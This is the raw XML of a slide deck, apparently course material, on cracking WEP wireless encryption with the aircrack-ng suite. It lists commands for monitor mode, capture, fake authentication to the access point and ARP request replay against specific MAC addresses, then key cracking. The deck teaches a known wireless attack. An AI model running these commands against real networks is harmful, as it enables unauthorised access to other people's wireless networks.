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0"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId21"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="330" r:id="rId3"/>
    <p:sldId id="372" r:id="rId4"/>
    <p:sldId id="359" r:id="rId5"/>
    <p:sldId id="366" r:id="rId6"/>
    <p:sldId id="360" r:id="rId7"/>
    <p:sldId id="373" r:id="rId8"/>
    <p:sldId id="361" r:id="rId9"/>
    <p:sldId id="364" r:id="rId10"/>
    <p:sldId id="362" r:id="rId11"/>
    <p:sldId id="363" r:id="rId12"/>
    <p:sldId id="380" r:id="rId13"/>
    <p:sldId id="377" r:id="rId14"/>
    <p:sldId id="378" r:id="rId15"/>
    <p:sldId id="368" r:id="rId16"/>
    <p:sldId id="381" r:id="rId17"/>
    <p:sldId id="382" r:id="rId18"/>
    <p:sldId id="383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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId27"/>
      <p:bold r:id="rId28"/>
      <p:italic r:id="rId29"/>
      <p:boldItalic r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
      <p:italic r:id="rId31"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sniglet" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Dosis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1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11/22/2018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716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  <p:sldLayoutId id="2147483659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/>
              <a:t>Wired Equivalent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Privacy (WEP) Cracking : Force AP Generate Frames</a:t>
            </a:r>
            <a:endParaRPr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Step 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Our wireless card sends ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requests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Wait for an ARP packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capture it and replay (retransmit)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7716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Replay command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8100800" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>48:5D:36:06:CF:C8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -h 9C:EF:D5:FE:2E:F3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wlan0mon </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> request replay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>48:5D:36:06:CF:C8: AP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9C:EF:D5:FE:2E:F3: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>source MAC address (either an associated client or from fake authentication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wlan0mon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wireless interface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9840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Split Terminal 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useful tool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2" y="138145"/>
            <a:ext cx="4751920" cy="395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93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Terminator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89" y="1231672"/>
            <a:ext cx="5133975" cy="83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89" y="2342172"/>
            <a:ext cx="2844723" cy="23805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120" y="2712308"/>
            <a:ext cx="3393022" cy="164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8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2277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="599485" y="315764"/>
            <a:ext cx="2901789" cy="41772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464" y="629438"/>
            <a:ext cx="5094467" cy="340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96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commands you needed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4" y="1302837"/>
            <a:ext cx="7298795" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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airmon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-ng start wlan0 (Terminal 1)</a:t>
            </a:r>
          </a:p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airodump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-ng --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bssid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48:5D:36:06:CF:C8 --channel 6 --write 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arp_wep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wlan0mon (Terminal 1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aireplay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-ng --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fakeauth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0 -a  48:5D:36:06:CF:C8  -h 9C:EF:D5:FE:2E:F3  wlan0mon  (Terminal 2)</a:t>
            </a:r>
          </a:p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aireplay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-ng --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arpreplay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-b 48:5D:36:06:CF:C8  -h 9C:EF:D5:FE:2E:F3  wlan0mon (Terminal 3)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aircrack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-ng  arp_wep-01.cap (Terminal 2)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68191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Attacking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339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15" y="0"/>
            <a:ext cx="75621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9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47" y="0"/>
            <a:ext cx="77433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6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 review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4" y="1302837"/>
            <a:ext cx="7729325" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>i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wconfig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airmon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-ng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start wlan0</a:t>
            </a:r>
          </a:p>
          <a:p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airodump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-ng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wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p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airmon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-ng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stop wlan0mon //optional command to disable monitor mode</a:t>
            </a:r>
          </a:p>
          <a:p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airodump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-ng --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bssid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48:5D:36:06:CF:C8 --channel 6 --write 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arp_wep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wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p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aircrack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-ng arp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_wep-01.cap //optional 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5807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33" y="175882"/>
            <a:ext cx="8659433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0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7567400" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniffing packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wait </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>too long to sniff enough packets (IVs)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If no device connects to AP, we can’t sniff enough packets for the statistical attack.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074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Force AP to sent packets to our wireless card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5779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7491200" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6985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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Packets sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0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Step 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Associate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>our wireless card with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>an AP (Use our wireless card to send fake authentication request packets to the AP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="6985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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Our wireless card sends ARP requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="6985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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: The AP has to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>generate ARP reply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>packets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8091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Step 0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sniffing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1695"/>
            <a:ext cx="8020050" cy="2219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98245"/>
            <a:ext cx="80200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29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Step 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Associate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>our wireless card with an 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5" y="1082425"/>
            <a:ext cx="8243676" cy="3918275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>&lt;options&gt; &lt;replay interface&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakeauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0 -a  48:5D:36:06:CF:C8  -h 9C:EF:D5:FE:2E:F3  wlan0mon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>&lt;options&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>fakeauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t> delay: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>fake authentication with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>AP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reassociation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> timing in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>seconds/delay 0 second</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>access point MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>smac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>our card MAC address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>&lt;replay interface&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Wlan0mon: our interface name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4533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76200"/>
            <a:ext cx="8654492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46399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379</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>68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Calibri</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Sniglet</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Dosis</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Wired Equivalent Privacy (WEP) Cracking : Force AP Generate Frames</vt:lpstr>
      <vt:lpstr>Commands review</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Problems</vt:lpstr>
      <vt:lpstr>Solution</vt:lpstr>
      <vt:lpstr>Steps</vt:lpstr>
      <vt:lpstr>Step 0: Packets sniffing</vt:lpstr>
      <vt:lpstr>Step 1:  Associate our wireless card with an AP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Step 2: Our wireless card sends ARP requests</vt:lpstr>
      <vt:lpstr>Replay command</vt:lpstr>
      <vt:lpstr>Split Terminal </vt:lpstr>
      <vt:lpstr>Install Terminator</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>All commands you needed</vt:lpstr>
      <vt:lpstr>Attacking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156</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-23T01:51:28Z</dcterms:modified>
</cp:coreProperties>
</file>